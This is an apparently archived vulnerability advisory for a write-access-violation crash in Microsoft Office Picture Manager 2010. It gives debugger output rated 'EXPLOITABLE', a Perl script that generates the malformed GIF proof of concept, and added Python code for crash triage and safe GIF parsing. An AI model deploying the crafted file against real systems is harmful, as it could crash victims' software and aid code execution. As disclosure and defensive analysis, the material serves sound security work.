
# Title : Microsoft Office Picture Manager 2010 Crash PoC
# Published : 2012-10-25
# Author :


Title     :  Microsoft Office Picture Manager 2010 memory corruption
Version   :  Microsoft Office professional Plus 2010
Crash     :  http://img715.imageshack.us/img715/7364/pocl.png
Date      :  2012-10-24
Vendor    :  http://office.microsoft.com
Impact    :  Med/High
Contact   :  coolkaveh [at] rocketmail.com
Twitter   :  @coolkaveh
Tested    :  XP SP3 ENG
###############################################################################
Bug :
----
Notice: to test the PoC, run Microsoft Office Picture Manager under a
debugger and then open the PoC file.
----
Successful exploitation could allow an attacker to execute arbitrary code.
----
################################################################################
(554.7a0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0620104a ebx=04f1417f ecx=0000004f edx=0000004f esi=06108348 edi=00000153
eip=4406b8e1 esp=0012e4c4 ebp=0012e4f0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\OFFICE14\OGL.DLL - 
OGL!GdipSetPenCustomEndCap+0xb00:
4406b8e1 8818            mov     byte ptr [eax],bl          ds:0023:0620104a=??
0:000> !exploitable -v
eax=0620104a ebx=04f1417f ecx=0000004f edx=0000004f esi=06108348 edi=00000153
eip=4406b8e1 esp=0012e4c4 ebp=0012e4f0 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
OGL!GdipSetPenCustomEndCap+0xb00:
4406b8e1 8818            mov     byte ptr [eax],bl          ds:0023:0620104a=??
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x620104a
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0x2709141e.0x286f1728

Description: User Mode Write AV
Short Description: WriteAV
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at OGL!GdipSetPenCustomEndCap+0x0000000000000b00 (Hash=0x2709141e.0x286f1728)

User mode write access violations that are not near NULL are exploitable.
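As an added example (not part of the advisory), the following Python applies the classification rule quoted above to a crash dump in the shape of the one printed here, and also reports which register held the faulting address. The 64 KiB "near NULL" window and the two verdicts for the other cases are my simplifying assumptions for illustration, not !exploitable's actual logic; the sample dump is constructed from the values on this page.

```python
import re

# Constructed excerpt in the shape of the advisory's WinDbg/!exploitable output;
# the values are the ones printed on the page, the layout is mine.
SAMPLE_DUMP = """\
(554.7a0): Access violation - code c0000005 (first chance)
eax=0620104a ebx=04f1417f ecx=0000004f edx=0000004f esi=06108348 edi=00000153
eip=4406b8e1 esp=0012e4c4 ebp=0012e4f0 iopl=0         nv up ei pl nz na po nc
OGL!GdipSetPenCustomEndCap+0xb00:
4406b8e1 8818            mov     byte ptr [eax],bl          ds:0023:0620104a=??
Exception Faulting Address: 0x620104a
Exception Sub-Type: Write Access Violation
"""

# Assumed "near NULL" window (64 KiB). !exploitable's own threshold is not
# stated on the page, so this is a simplification for illustration only.
NEAR_NULL_LIMIT = 0x10000

REG_RE = re.compile(r"\b(e[a-d]x|e[sd]i|e[bs]p|eip)=([0-9a-f]{8})")
ADDR_RE = re.compile(r"Exception Faulting Address:\s*0x([0-9a-f]+)", re.I)
KIND_RE = re.compile(r"Exception Sub-Type:\s*(Read|Write|Execute) Access Violation", re.I)


def parse_registers(dump):
    """Map register name -> value from the 'r'-style lines of the dump."""
    return {name: int(val, 16) for name, val in REG_RE.findall(dump)}


def parse_fault(dump):
    """Return (faulting address, 'read'|'write'|'execute'), or (None, None)."""
    addr = ADDR_RE.search(dump)
    kind = KIND_RE.search(dump)
    return (int(addr.group(1), 16) if addr else None,
            kind.group(1).lower() if kind else None)


def triage(dump):
    """Apply the page's rule (write AV not near NULL => EXPLOITABLE) plus two
    assumed, simplified companion rules for the other common cases."""
    regs = parse_registers(dump)
    addr, kind = parse_fault(dump)
    near_null = addr is not None and addr < NEAR_NULL_LIMIT
    # Registers equal to the faulting address: the pointer the bad access went through.
    via = [r for r, v in regs.items() if v == addr]
    if kind == "write" and not near_null:
        verdict = "EXPLOITABLE"               # the rule quoted on the page
    elif kind == "write":
        verdict = "PROBABLY_EXPLOITABLE"      # assumption: write through a NULL-based pointer
    elif kind == "read" and near_null:
        verdict = "PROBABLY_NOT_EXPLOITABLE"  # assumption: plain NULL-pointer read
    else:
        verdict = "UNKNOWN"
    return {"kind": kind, "address": addr, "near_null": near_null,
            "via_registers": via, "verdict": verdict}


if __name__ == "__main__":
    print(triage(SAMPLE_DUMP))
```

Run against the sample it reports a write through eax at 0x0620104a, well outside the near-NULL window, which is exactly why !exploitable rates the crash as it does.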
##############################################################################################################
The PoC file can be downloaded from
http://imageshack.us/scaled/landing/835/poc2.gif
or generated with the Perl script below:
##############################################################################################################
#!/usr/bin/perl
use strict;
use warnings;

# Raw bytes of the PoC GIF; each \xNN escape is one byte of the output file.
my $poc =
"\x47\x49\x46\x38\x39\x61\x93\x00\x33\x00\xE6\x7F\x00\x23\xCC\xF5\x03\xC7\xB6\xF7\x96\x25\xFC\xC7\x26".
"\xFD\x69\x2D\xA4\xD8\x7B\x0C\xA4\xFB\x6A\xD5\x9D\xFC\xCB\xA7\x1F\xC5\xF6\xF0\x7A\x51\x65\xCE\xFA\xD9".
"\xF0\xC7\xB3\xE3\x91\xFD\x86\x4A\xF9\x77\x16\xF6\xAF\x4A\xFE\x57\x06\x93\xCD\x64\x03\x92\xFE\x14\xB3".
"\xF9\x8D\xCA\x5B\xFE\xD4\xBE\xFE\xE6\xA1\xF8\xBC\x6A\xC3\xE8\xFE\xF5\x5B\x34\xFD\xE1\x84\xFE\xE5\xD7".
"\xF6\x86\x1F\x00\xA7\x99\xF9\xBC\x36\xF8\xC8\x8D\x15\x98\xFF\x85\xC5\x51\xFA\xCC\x74\x44\xD4\xF5\xAE".
"\xDD\xFF\xFD\xD7\x5B\xFD\xB1\x85\xFF\x91\x68\xAC\xDD\x85\xA7\xE4\x79\x10\xAB\xFA\x15\xB9\xC8\x37\xA8".
"\xFF\xDF\xF1\xFF\x00\xB2\xA4\x00\xBA\xAB\xFC\x62\x0A\xCA\xEF\xAD\x2C\xA3\xFF\x57\xB8\xFF\x00\xBE\xB0".
"\xF3\xFB\xFF\x01\xAD\xA0\xE7\xF5\xDA\x48\xB3\xFF\xE4\xF9\xFE\x95\xD4\xFF\x1A\xC2\xD7\xFA\xF5\xD5\x09".
"\x9E\xFC\x02\x8E\xFF\x0A\x92\xFF\xD3\xF1\xBB\xFE\xF9\xF4\xFF\x5E\x1A\xFF\xF6\xF0\x99\xD1\x6C\xEF\x56".
"\x39\x19\xBB\xF8\xD5\xF1\xFE\x9F\xD4\x73\x94\xD2\x62\xCD\xE8\xB8\x64\xBE\xFF\xEC\x4C\x3D\xC8\xF0\xFD".
"\x06\x99\xFD\xFB\xB5\x27\x87\xC7\x54\x20\x9D\xFF\x1B\xC0\xF7\x8A\xC8\x57\x9E\xDB\x6E\xEF\xFA\xE6\x16".
"\xB7\xF8\xFF\x50\x03\x01\xB6\xA9\xFA\x6D\x10\x8C\x8C\x8C\xD9\xD9\xD9\xB2\xB2\xB2\x70\x70\x70\x79\x79".
"\x79\xF5\xF5\xF5\xE2\xE2\xE2\xEC\xEC\xEC\xA0\xA0\xA0\xC5\xC5\xC5\xA9\xA9\xA9\xCF\xCF\xCF\xBC\xBC\xBC".
"\x96\x96\x96\x83\x83\x83\x90\xCF\x5E\x97\xD5\x66\x74\xDD\xFA\x19\xBB\xB6\xFD\xF4\xE5\x13\xBC\xA2\xD2".
"\xF2\xE0\xF7\xFB\xF4\xFA\xFD\xF8\x89\xCC\x68\xFC\xCF\x41\xC1\xE9\xA1\x6C\xD3\xC8\x7D\xCD\x79\x0D\xBC".
"\xAA\xFE\xEE\xC3\x92\xDD\x97\x97\xE6\xF8\xA7\xE4\xFD\x3F\xBD\x86\x66\x66\x66\xFF\xFF\xFF\x21\xFF\x0B".
"\x58\x4D\x50\x20\x44\x61\x74\x61\x58\x4D\x50\x3C\x3F\x78\x70\x61\x63\x6B\x65\x74\x20\x62\x65\x67\x69".
"\x6E\x3D\x22\xEF\xBB\xBF\x22\x20\x69\x64\x3D\x22\x57\x35\x4D\x30\x4D\x70\x43\x65\x68\x69\x48\x7A\x72".
"\x65\x53\x7A\x4E\x54\x63\x7A\x6B\x63\x39\x64\x22\x3F\x3E\x20\x3C\x78\x3A\x78\x6D\x70\x6D\x65\x74\x61".
"\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x3D\x22\x61\x64\x6F\x62\x65\x3A\x6E\x73\x3A\x6D\x65\x74\x61\x2F\x22".
"\x20\x78\x3A\x78\x6D\x70\x74\x6B\x3D\x22\x41\x64\x6F\x62\x65\x20\x58\x4D\x50\x20\x43\x6F\x72\x65\x20".
"\x35\x2E\x30\x2D\x63\x30\x36\x30\x20\x36\x31\x2E\x31\x33\x34\x37\x37\x37\x2C\x20\x32\x30\x31\x30\x2F".
"\x30\x32\x2F\x31\x32\x2D\x31\x37\x3A\x33\x32\x3A\x30\x30\x20\x20\x20\x20\x20\x20\x20\x20\x22\x3E\x20".
"\x3C\x72\x64\x66\x3A\x52\x44\x46\x20\x78\x6D\x6C\x6E\x73\x3A\x72\x64\x66\x3D\x22\x68\x74\x74\x70\x3A".
"\x2F\x2F\x77\x77\x77\x2E\x77\x33\x2E\x6F\x72\x67\x2F\x31\x39\x39\x39\x2F\x30\x32\x2F\x32\x32\x2D\x72".
"\x64\x66\x2D\x73\x79\x6E\x74\x61\x78\x2D\x6E\x73\x23\x22\x3E\x20\x3C\x72\x64\x66\x3A\x44\x65\x73\x63".
"\x72\x69\x70\x74\x69\x6F\x6E\x20\x72\x64\x66\x3A\x61\x62\x6F\x75\x74\x3D\x22\x22\x20\x78\x6D\x6C\x6E".
"\x73\x3A\x78\x6D\x70\x4D\x4D\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x73\x2E\x61\x64\x6F\x62\x65\x2E".
"\x63\x6F\x6D\x2F\x78\x61\x70\x2F\x31\x2E\x30\x2F\x6D\x6D\x2F\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x73\x74".
"\x52\x65\x66\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x73\x2E\x61\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F".
"\x78\x61\x70\x2F\x31\x2E\x30\x2F\x73\x54\x79\x70\x65\x2F\x52\x65\x73\x6F\xC2\x72\x63\x65\x52\x65\x66".
"\x23\x22\x20\x78\x6D\x6C\x6E\x73\x3A\x78\x6D\x70\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x6E\x73\x2E\x61".
"\x64\x6F\x62\x65\x2E\x63\x6F\x6D\x2F\x78\x61\x70\x2F\x31\x2E\x30\x2F\x22\x20\x78\x6D\x70\x4D\x4D\x3A".
"\x4F\x72\x69\x67\x69\x6E\x61\x6C\x44\x6F\x63\x75\x6D\x65\x6E\x74\x49\x44\x3D\x22\x78\x6D\x70\x2E\x64".
"\x69\x64\x3A\x38\x41\x39\x46\x30\x45\x41\x35\x41\x30\x30\x44\x45\x32\x31\x31\x41\x32\x34\x43\x41\x43".
"\x31\x35\x35\x33\x34\x41\x36\x34\x31\x31\x22\x20\x78\x6D\x70\x4D\x4D\x3A\x44\x6F\x63\x75\x6D\x65\x6E".
"\x74\x49\x44\x3D\x22\x78\x6D\x70\x2E\x64\x69\x64\x3A\x45\x32\x45\x42\x41\x43\x38\x44\x31\x34\x39\x46".
"\x31\x31\x45\x32\x41\x41\x36\x44\x42\x45\x41\x35\x41\x39\x43\x45\x43\x42\x45\x34\x22\x20\x78\x6D\x70".
"\x4D\x4D\x3A\x49\x6E\x73\x74\x61\x6E\x63\x65\x49\x44\x3D\x22\x78\x6D\x70\x2E\x69\x69\x64\x3A\x45\x32".
"\x45\x42\x41\x43\x38\x43\x31\x34\x39\x46\x31\x31\x45\x32\x41\x41\x36\x44\x42\x45\x41\x35\x41\x39\x43".
"\x45\x43\x42\x45\x34\x22\x20\x78\x6D\x70\x3A\x43\x72\x65\x61\x74\x6F\x72\x54\x6F\x6F\x6C\x3D\x22\x41".
"\x64\x6F\x62\x65\x20\x50\x68\x6F\x74\x6F\x73\x68\x6F\x70\x20\x43\x53\x35\x20\x57\x69\x6E\x64\x6F\x77".
"\x73\x22\x3E\x20\x3C\x78\x6D\x70\x4D\x4D\x3A\x44\x65\x72\x69\x76\x65\x64\x46\x72\x6F\x6D\x20\x73\x74".
"\x52\x65\x66\x3A\x69\x6E\x73\x74\x61\x6E\x63\x65\x49\x44\x3D\x22\x78\x6D\x70\x2E\x69\x69\x64\x3A\x42".
"\x41\x32\x30\x37\x42\x38\x35\x39\x45\x31\x34\x45\x32\x31\x31\x41\x30\x39\x34\x41\x44\x42\x30\x30\x35".
"\x30\x30\x41\x38\x35\x30\x22\x20\x73\x74\x52\x65\x66\x3A\x64\x6F\x63\x75\x6D\x65\x6E\x74\x49\x44\x3D".
"\x22\x78\x6D\x70\x2E\x64\x69\x64\x3A\x38\x41\x39\x46\x30\x45\x41\x35\x41\x30\x30\x44\x45\x32\x31\x31".
"\x41\x32\x34\x43\x41\x43\x31\x35\x35\x33\x34\x41\x36\x34\x31\x31\x22\x2F\x3E\x20\x3C\x2F\x72\x64\x66".
"\x3A\x44\x65\x73\x63\x72\x69\x70\x74\x69\x6F\x6E\x3E\x20\x3C\x2F\x72\x64\x66\x3A\x52\x44\x46\x3E\x20".
"\x3C\x2F\x78\x3A\x78\x6D\x70\x6D\x65\x74\x61\x3E\x20\x3C\x3F\x78\x70\x61\x63\x6B\x65\x74\x20\x65\x6E".
"\x64\x3D\x22\x72\x22\x3F\x3E\x01\xFF\xFE\xFD\xFC\xFB\xFA\xF9\xF8\xF7\xF6\xF5\xF4\xF3\xF2\xF1\xF0\xEF".
"\xEE\xED\xEC\xEB\xEA\xE9\xE8\xE7\xE6\xE5\xE4\xE3\xE2\xE1\xE0\xDF\xDE\xDD\xDC\xDB\xDA\xD9\xD8\xD7\xD6".
"\xD5\xD4\xD3\xD2\xD1\xD0\xCF\xCE\xCD\xCC\xCB\xCA\xC9\xC8\xC7\xC6\xC5\xC4\xC3\xC2\xC1\xC0\xBF\xBE\xBD".
"\xBC\xBB\xBA\xB9\xB8\xB7\xB6\xB5\xB4\xB3\xB2\xB1\xB0\xAF\xAE\xAD\xAC\xAB\xAA\xA9\xA8\xA7\xA6\xA5\xA4".
"\xA3\xA2\xA1\xA0\x9F\x9E\x9D\x9C\x9B\x9A\x99\x98\x97\x96\x95\x94\x93\x92\x91\x90\x8F\x8E\x8D\x8C\x8B".
"\x8A\x89\x88\x87\x86\x85\x84\x83\x82\x81\x80\x7F\x7E\x7D\x7C\x7B\x7A\x79\x78\x77\x76\x75\x74\x73\x72".
"\x71\x70\x6F\x6E\x6D\x6C\x6B\x6A\x69\x68\x67\x66\x65\x64\x63\x62\x61\x60\x5F\x5E\x5D\x5C\x5B\x5A\x59".
"\x58\x57\x56\x55\x54\x53\x52\x51\x50\x4F\x4E\x4D\x4C\x4B\x4A\x49\x48\x47\x46\x45\x44\x43\x42\x41\x40".
"\x3F\x3E\x3D\x3C\x3B\x3A\x39\x38\x37\x36\x35\x34\x33\x32\x31\x30\x2F\x2E\x2D\x2C\x2B\x2A\x29\x28\x27".
"\x26\x25\x24\x23\x22\x21\x20\x1F\x1E\x1D\x1C\x1B\x1A\x19\x18\x17\x16\x15\x14\x13\x12\x11\x10\x0F\x0E".
"\x0D\x0C\x0B\x0A\x09\x08\x07\x06\x05\x04\x03\x02\x01\x00\x00\x21\xF9\x04\x01\x00\x00\x7F\x00\x2C\x00".
"\x00\x00\x00\x93\x00\x33\x00\x00\x07\xFF\x80\x7F\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x8B\x8C\x8D\x8E".
"\x8F\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9A\x9B\x9C\x9D\x9E\x9F\xA0\xA1\xA2\xA3\xA4\xA5\xA6\xA7".
"\xA8\xA9\xAA\xAB\xAC\xAD\xAE\xAF\xB0\xB1\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xBB\xBC\xBD\xBE\xBF\xC0".
"\xC1\x8D\x36\x19\x3B\xC6\x19\x36\xC2\xCA\x86\x19\x34\x39\x39\x34\x34\x4C\x0B\x2E\xCB\xD6\x25\x33\xD9".
"\x2D\xDB\xCF\x34\xD5\xD6\xC1\x25\x21\xE3\x21\x52\x52\xD9\x33\x2D\x34\xE0\xC0\x2E\x21\x3F\x40\xF1\xF1".
"\xE3\xE6\x33\x25\xEC\xBE\x4C\x3F\xFB\xFC\x3F\x13\xF3\x21\x98\xE0\xE3\xE5\x62\x82\xC1\x83\x13\xFA\xFD".
"\x9B\x31\x70\xD7\x8E\x27\x10\x23\x4E\x78\x62\xB0\x5F\x43\x5D\x39\x7C\x68\xDC\xE8\x23\x22\xC5\x7D\x17".
"\x5D\x09\xB1\x60\x81\xC8\x21\x87\x28\x53\x1A\xF0\xB1\xB2\x23\xC5\x09\x21\x5B\x21\x40\xA1\xC0\x01\x87".
"\x42\x48\x56\xE8\xDC\xB9\x42\xA5\x46\x88\x31\x59\xA1\x20\x40\x60\xC8\x90\x9B\x83\x32\x50\x58\xB1\x74".
"\x29\xCF\x94\x3E\x72\x04\x5D\x85\x62\x48\x04\x2C\x58\x8E\x26\xBD\xC2\xF5\x0A\x85\xAF\x5F\x9F\x0A\x9C".
"\x9A\xEA\x04\x56\xAC\x11\x1C\x0C\x72\x72\xA4\xAD\x5B\xAE\x60\xFF\x77\xF2\x21\x9B\xCA\x02\xDA\x08\x31".
"\x62\x20\x10\xE4\x64\x8A\xDF\xBF\x53\xDA\xC2\x5D\x9A\x8C\x2E\x2A\x02\x78\xF3\x6A\xD1\x62\xD2\x49\x82".
"\xC7\x90\x13\xF8\x15\x4C\x61\x81\xE1\xB2\x8A\x17\x3F\x38\xF1\x07\x09\x80\xCF\xA0\x01\x40\x0E\x7C\x64".
"\xAE\x2A\x33\x63\xBE\xF8\x59\xFD\x05\xCD\x19\x30\x86\xC8\xA0\x51\xCD\xDA\x35\x6C\x45\x61\xCA\x6C\xA1".
"\xCD\x7A\xCB\x98\x33\x61\x18\x89\x39\x83\x26\xCD\xEA\xDE\x5D\x82\x17\x22\xF2\x40\xF3\x83\x07\x1D\x04".
"\x7D\x66\xC1\x82\x47\xE8\xC7\x53\x12\x14\x3E\xC5\x85\xF7\xF1\xE3\x5E\xBA\x0C\x32\xE3\xFD\xBB\x9F\xF0".
"\x88\xBA\x9B\x5F\xBF\xDA\xCB\x18\xE5\x85\xC4\x8C\x61\x6F\xFE\x8B\x99\x42\x27\x9E\x43\xEF\xD0\x61\x2F".
"\x09\x16\x1E\x04\x78\x83\x75\xA0\x25\xC0\xC6\x29\x5B\x24\x48\x9F\x79\x69\x80\x51\xC6\x82\xDF\x35\x58".
"\x08\x19\xEB\x25\xB8\x1B\x7B\xE2\x0D\x62\xA1\x17\x10\x9A\x37\x46\x21\x0E\xF0\xC7\x9F\x00\x10\xFC\xB1".
"\xC0\x0D\x01\x7A\x80\x62\x16\xA1\xE9\x70\x8A\x79\xE1\xC1\x17\x46\x17\x1C\xB2\x06\x1E\x70\x83\xE4\x56".
"\xA3\x1F\x68\x10\x02\x46\x8D\xE1\x89\x61\x88\x18\x66\x94\x41\x5B\x86\x82\xAC\x87\x06\xFF\x19\x42\xE6".
"\x48\xC6\x16\xDF\x21\xF9\x47\x1E\x23\x76\x60\x44\x07\x3D\xEC\xA1\xE2\x0D\x5C\xBE\x70\xC3\x0B\xD6\x1D".
"\xF8\xE2\x71\x12\x1A\x02\x86\x71\xDF\xA1\x71\x5B\x7C\x68\xFA\xC1\xC5\x78\xC7\xBD\xB9\x48\x18\x63\x48".
"\xF9\x9D\x17\x72\xA6\xB7\x63\x93\x82\x20\x20\x80\x00\x46\x34\xD1\x04\x08\x4E\x74\xF9\xC2\xA1\x88\xF2".
"\xE0\xE2\x98\x7E\x7C\xB1\xA6\x99\xBC\x39\x9A\x88\x18\x35\x7E\x28\x48\x17\xC7\x51\xF2\x1D\x7C\x89\x70".
"\x71\xDC\x19\x85\x60\x20\x80\xA0\x4D\x28\xF0\x47\x1B\x2F\x64\xA1\x2A\x0C\xAA\x66\xD1\x47\x10\xA8\x7C".
"\xBA\xC8\x19\xC7\x91\xB1\xC8\x83\xE7\xC1\xB9\x5A\x19\x8F\x3A\x72\x9C\xA5\x8C\x40\xE9\xC7\x16\x85\x08".
"\x01\x81\xA0\x46\x18\xC1\x81\x1D\x59\xC0\x00\x43\x0D\xCF\xC2\xF0\xC6\x1C\x54\x2C\xC1\x68\x9E\xE9\xC5".
"\xB9\x88\xA7\xAB\x0D\xF2\xE3\x77\xBE\x75\xD1\x85\x19\x5C\x70\xC1\xE7\x21\xC7\x49\xA9\x08\xA6\xC3\x1A".
"\xE2\x46\xB2\xC9\x9E\x00\x07\x1E\x35\xD4\x1B\x40\xBD\x77\x48\x50\x81\x08\x0C\x98\xA2\xAD\x22\xDC\xFA".
"\xC1\x48\xC0\x84\x50\xD8\x61\xA3\x63\xD8\x5A\x48\xBA\x8E\xB0\x4B\xAC\x21\x50\x68\x20\xB1\x00\x3D\x1C".
"\x50\x43\xFF\x00\x18\x07\x70\x40\x11\xFA\x8A\x50\x01\x0E\xA5\xFC\xDB\x69\xA6\xDB\x92\x3C\x88\x7C\x3B".
"\x42\xF8\x05\xA7\x0C\x37\xE2\xF0\x21\x03\x40\x41\x94\x00\x17\x04\x71\x40\xC6\x07\x24\xC1\xF1\xBE\x22".
"\x14\x10\xF2\x6A\xD8\x1E\x42\x70\xC9\xDD\x1E\x22\x06\x17\xE2\x76\x61\xE1\x7A\x5E\xF0\xD9\x32\x23\x2F".
"\x1B\x62\xC2\x00\x03\x08\x00\x05\x1D\x38\xD4\xD1\x80\x1E\x29\xA4\xA0\xB3\x04\x54\x88\x10\x45\x05\xFD".
"\x8E\x22\x72\xB6\x45\x03\x6C\xB2\x23\x62\x3C\xF9\xF4\xD3\x8B\x44\x5D\xC8\x06\x54\xD7\xDD\x83\xD6\x0D".
"\xA4\x50\x80\xCE\x6A\x84\x1D\x85\x1A\x3E\x9B\x0D\x34\xD1\x02\x13\x4E\x09\x6D\x0F\xFF\x01\xF7\xBA\xAB".
"\x25\x4E\x48\x1E\x75\x53\x7D\x01\x03\x79\xEB\x9D\x84\xBE\x51\x88\x40\x85\x1A\x55\x58\x21\xB8\x9B\x86".
"\x87\xFE\x47\xAF\x8B\x08\x9B\xF8\xE2\x89\xC8\x5D\x08\x1D\x03\x7C\xD0\xFA\x08\x72\xE4\xBD\xF7\xCE\x22".
"\x68\xAE\x44\x15\x65\x87\x72\xB6\xD0\x6B\xA3\x5D\xF8\x1F\x4A\xDF\xC7\x48\x18\xC7\x95\x31\x08\xEA\x88".
"\xA8\xFE\xF8\x07\xCC\x7F\x30\xC2\x1F\x38\x58\x5E\x44\x05\x7E\xAB\xB1\x86\x0A\xB0\x8A\xB2\xBB\x21\x43".
"\xAB\x9D\x36\xBB\x5F\x94\x61\x06\x97\xE9\x7F\x88\x41\xA3\xC8\xC8\x1F\xA2\x3C\x21\x23\x7C\x00\x01\x04".
"\xCF\xFF\xC1\xC0\xD7\x3C\x6F\x5E\x85\x0A\xB9\x83\xB2\x7D\x21\xDD\x8F\xFC\x3D\xD3\x16\x4A\x50\xCA\xFC".
"\x60\xBC\xE3\xAD\x46\x5D\xA9\x6B\x5C\x22\x84\x80\x81\xF7\x81\x60\x10\x4B\x90\x80\x1A\x32\x37\xB6\xEB".
"\xA9\xC0\x73\xDA\x1B\x9C\xF7\x7E\xE7\xBF\xDF\xA1\xEC\x60\xED\x01\x15\x21\xD2\x67\x88\xF5\x15\xC2\x02".
"\x08\x10\x02\x21\x18\x50\x84\xDA\xD9\x4F\x05\x32\x20\x85\x85\x38\x75\x88\x30\x58\x68\x78\x37\x2C\x44".
"\x91\xB6\x30\xC0\xD5\xA4\x21\x61\xA4\xB3\x90\xC2\x18\xF1\xA4\x2D\x14\x30\x12\x71\x58\x42\x12\x2A\xB0".
"\x86\x06\x64\xEF\x32\x50\x7C\x44\x20\x00\x00\x3B";

# Write the bytes unmodified (":raw" disables newline translation on Windows).
open(my $fh, ">:raw", "poc.gif") or die "cannot write poc.gif: $!";
print $fh $poc;
close($fh);
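To see where the crash input sits inside the file before it reaches the image library, an analyst usually walks the GIF block chain rather than looking at a hex dump. The following Python is an added example, not part of the advisory or any Microsoft code: it parses the GIF89a container (header, logical screen descriptor, colour tables, extensions, image descriptors, sub-block chains, trailer) and bound-checks every length byte, so a truncated or oversized chain is reported instead of read past the buffer. Given a path (for instance the poc.gif the script above writes) it lists each block; with no argument it parses a small GIF constructed inline for offline use. The sample bytes, block names and function names are mine.

```python
import struct
import sys


class GifFormatError(ValueError):
    """Raised when the block structure does not fit inside the data."""


# Constructed minimal GIF89a for offline use (not the advisory's PoC): a 2x1
# image with a two-colour global palette, a comment extension, a NETSCAPE2.0
# application extension and a one-sub-block LZW data stream.
SAMPLE_GIF = (
    b"GIF89a"
    + struct.pack("<HHBBB", 2, 1, 0x80, 0, 0)         # screen 2x1, global table flag, 2 colours
    + b"\x00\x00\x00\xff\xff\xff"                    # global colour table: black, white
    + b"\x21\xfe\x05hello\x00"                        # comment extension, 5-byte sub-block
    + b"\x21\xff\x0bNETSCAPE2.0\x03\x01\x00\x00\x00"  # application extension, 3-byte sub-block
    + b"\x2c" + struct.pack("<HHHHB", 0, 0, 2, 1, 0)  # image descriptor, no local table
    + b"\x02\x02\x44\x01\x00"                         # LZW min code size 2, 2-byte sub-block
    + b"\x3b"                                         # trailer
)

EXTENSION_NAMES = {
    0x01: "plain_text_extension",
    0xF9: "graphic_control_extension",
    0xFE: "comment_extension",
    0xFF: "application_extension",
}


def _sub_blocks(data, pos):
    """Walk a length-prefixed sub-block chain; return (payload, pos after 0x00).

    Every length byte comes from the file, so each one is checked against the
    buffer end before it is used."""
    out = bytearray()
    while True:
        if pos >= len(data):
            raise GifFormatError("sub-block chain truncated at offset %d" % pos)
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(out), pos
        if pos + n > len(data):
            raise GifFormatError("sub-block of %d bytes at offset %d runs past end" % (n, pos - 1))
        out += data[pos:pos + n]
        pos += n


def _colour_table_size(packed):
    """Colour table byte size from a packed field: 3 * 2^(size_bits + 1)."""
    return 3 * (2 ** ((packed & 0x07) + 1))


def walk_gif(data):
    """Return [(offset, block_name, payload_length), ...] for every block."""
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        raise GifFormatError("not a GIF87a/GIF89a stream")
    blocks = [(0, "header", 6), (6, "logical_screen_descriptor", 7)]
    pos = 13
    if data[10] & 0x80:  # global colour table flag in the packed byte
        n = _colour_table_size(data[10])
        if pos + n > len(data):
            raise GifFormatError("global colour table truncated")
        blocks.append((pos, "global_colour_table", n))
        pos += n
    while True:
        if pos >= len(data):
            raise GifFormatError("missing trailer (0x3B)")
        start, tag = pos, data[pos]
        pos += 1
        if tag == 0x3B:
            blocks.append((start, "trailer", 1))
            return blocks
        if tag == 0x2C:  # image descriptor: 9 bytes, optional local table, LZW stream
            if pos + 9 > len(data):
                raise GifFormatError("image descriptor truncated")
            lpacked = data[pos + 8]
            pos += 9
            if lpacked & 0x80:
                n = _colour_table_size(lpacked)
                if pos + n > len(data):
                    raise GifFormatError("local colour table truncated")
                blocks.append((pos, "local_colour_table", n))
                pos += n
            if pos >= len(data):
                raise GifFormatError("LZW minimum code size missing")
            pos += 1
            payload, pos = _sub_blocks(data, pos)
            blocks.append((start, "image", len(payload)))
        elif tag == 0x21:  # extension introducer followed by a label byte
            if pos >= len(data):
                raise GifFormatError("extension label missing")
            label = data[pos]
            pos += 1
            name = EXTENSION_NAMES.get(label, "unknown_extension_%02x" % label)
            payload, pos = _sub_blocks(data, pos)
            if label == 0xFF and len(payload) >= 11:  # first 11 bytes name the application
                name += ":" + payload[:11].decode("latin-1")
            blocks.append((start, name, len(payload)))
        else:
            raise GifFormatError("unknown block tag 0x%02x at offset %d" % (tag, start))


def is_well_formed(data):
    """True when the whole block chain fits inside the data and ends in a trailer."""
    try:
        walk_gif(data)
        return True
    except GifFormatError:
        return False


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_GIF
    for off, name, size in walk_gif(blob):
        print("0x%06x  %-36s %d payload bytes" % (off, name, size))
```

On the PoC the walker shows the "XMP DataXMP" application extension that follows the global colour table; XMP in GIF is stored as raw packet text ending in a 0x01, 0xFF, 0xFE ... 0x00 "magic trailer" so that a generic sub-block reader like `_sub_blocks` still lands on a terminator, which is why the chain parses even though the lengths are really character data.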